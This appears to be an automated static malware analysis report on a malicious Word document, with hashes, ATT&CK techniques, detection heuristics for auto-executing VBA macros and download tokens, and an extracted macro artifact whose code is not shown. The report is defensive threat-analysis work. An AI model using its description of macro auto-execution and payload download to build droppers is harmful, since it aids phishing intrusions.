Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1445e9dd185fe825…

MALICIOUS

Office (OLE)

Size: 150.5 KB
Created: 2018-03-29 14:12:00
Authoring application: Microsoft Office Word
First seen: 2018-04-12
MD5: 289e8bcc64bebb43bfc1261da574e64c
SHA-1: 762de3066bb2b0eae9cb7925830b1d557941759f
SHA-256: 1445e9dd185fe825ff51bebd51ec395ba636e9af8ec2ac0a77f939623d0c54d6
Risk Score: 224

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro, specifically an AutoOpen macro, which is a common technique for initial execution. Heuristics indicate the macro uses CreateObject and p-code execution, suggesting it's designed to download and execute a second-stage payload. The ClamAV detection name 'Doc.Malware.Emodldr-10025032-0' further confirms its malicious nature.

Heuristics (8)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 34197 bytes
SHA-256: 0e793cdbf5455e4114c3d15e290d0de94818171b8ee7097dddc44390b4dfa7ac
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 22 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script